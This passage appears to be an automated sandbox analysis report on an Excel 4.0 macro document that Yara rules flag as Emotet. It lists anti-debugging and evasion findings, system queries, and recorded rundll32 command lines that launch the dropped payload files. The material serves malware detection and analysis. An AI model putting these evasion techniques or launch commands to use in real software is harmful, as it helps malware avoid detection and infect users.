Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VZZdgPFp2xiOJtfpv[1].dll
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_025E6753 rdtsc 0_2_025E6753
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E450927 FindFirstFileExW, 3_2_6E450927
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E44AB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6E44AB0C
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E43E690 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex, 3_2_6E43E690
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E431290 GetProcessHeap,HeapAlloc,RtlAllocateHeap,HeapFree, 3_2_6E431290
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_025E6753 rdtsc 0_2_025E6753
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_01ED07D2 mov eax, dword ptr fs:[00000030h] 3_2_01ED07D2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E449990 mov eax, dword ptr fs:[00000030h] 3_2_6E449990
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E44EC0B mov ecx, dword ptr fs:[00000030h] 3_2_6E44EC0B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E4502CC mov eax, dword ptr fs:[00000030h] 3_2_6E4502CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E449920 mov esi, dword ptr fs:[00000030h] 3_2_6E449920
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E449920 mov eax, dword ptr fs:[00000030h] 3_2_6E449920
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_001B07D2 mov eax, dword ptr fs:[00000030h] 6_2_001B07D2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E44A462 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_6E44A462
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E44AB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6E44AB0C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E450326 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6E450326

HIPS / PFW / Operating System Protection Evasion:

Yara detected Xls With Macro 4.0
Source: Yara match File source: app.xml, type: SAMPLE
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc",qEPqGlpBy
Source: EXCEL.EXE, 00000000.00000002.747989999.00000000007F0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747735618.0000000000D70000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: EXCEL.EXE, 00000000.00000002.747989999.00000000007F0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747735618.0000000000D70000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: EXCEL.EXE, 00000000.00000002.747989999.00000000007F0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747735618.0000000000D70000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E44A584 cpuid 3_2_6E44A584
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E44A755 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 3_2_6E44A755

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match File source: 3.2.rundll32.exe.2ab960.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.2ab960.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.1ec0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.1ec0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.558061657.0000000001EC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.692050034.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.555217971.000000000029D000.00000004.00000020.sdmp, type: MEMORY